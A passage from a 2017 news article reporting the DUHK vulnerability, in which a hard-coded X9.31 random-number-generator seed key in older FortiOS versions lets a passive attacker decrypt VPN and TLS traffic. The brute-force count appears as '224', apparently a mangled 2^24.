Vulnerable implementation of rng enables decryption of FortiOS VPN traffic

By admin On Oct 24, 2017

Spread the love

Several researchers, including US cryptographer Matthew Green, have discovered vulnerable implementations of a random number generator, Ansi X9.31. These occur in the FortiOS operating system from manufacturer Fortinet.

The researchers present their findings in a paper and, ironically, in the form of a special site with their own logo and name. In addition, Green has published his own blog post. In it, he explains that RNGs are used in cryptography to generate random numbers. In the case of X9.31, which was approved by the US government through its FIPS program until 2016, it uses a changing state value and a fixed key. In 1998 it turned out that this is a vulnerability if the attacker finds out about this key.

By examining a large number of implementations of the RNG, the researchers discovered that Fortigate, among others, uses a pre-programmed key, or seed key. An attacker can extract it from the relevant firmware and thus carry out an attack on VPN and TLS traffic. For example, decryption is possible for a passive attacker who can observe network traffic and bruteforce a timestamp with 224 attempts. That takes about four minutes on a normal PC.

The researchers estimate based on an internet scan that about 25,000 devices from the manufacturer are affected with versions 4.3.0. to 4.3.18 of FortiOS. The manufacturer came in November of last year with a security update. Although these are older devices, according to the authors of the paper, the numbers show that they are still in use.

Because the RNG had been deprecated since 2011 and was removed from the FIPS list in January, the implications of the discovery appear to be manageable, as many manufacturers have since released updates. The published attack, dubbed DUHK, is “the result of the failure of the federal cryptography standardization process,” according to the researchers. For example, none of the descriptions of the algorithm mention that the seed key should not be discoverable by the attacker. There would be no indication that the vulnerability, with attribute CVE-2016-8492, is being actively exploited.

Other potentially vulnerable implementations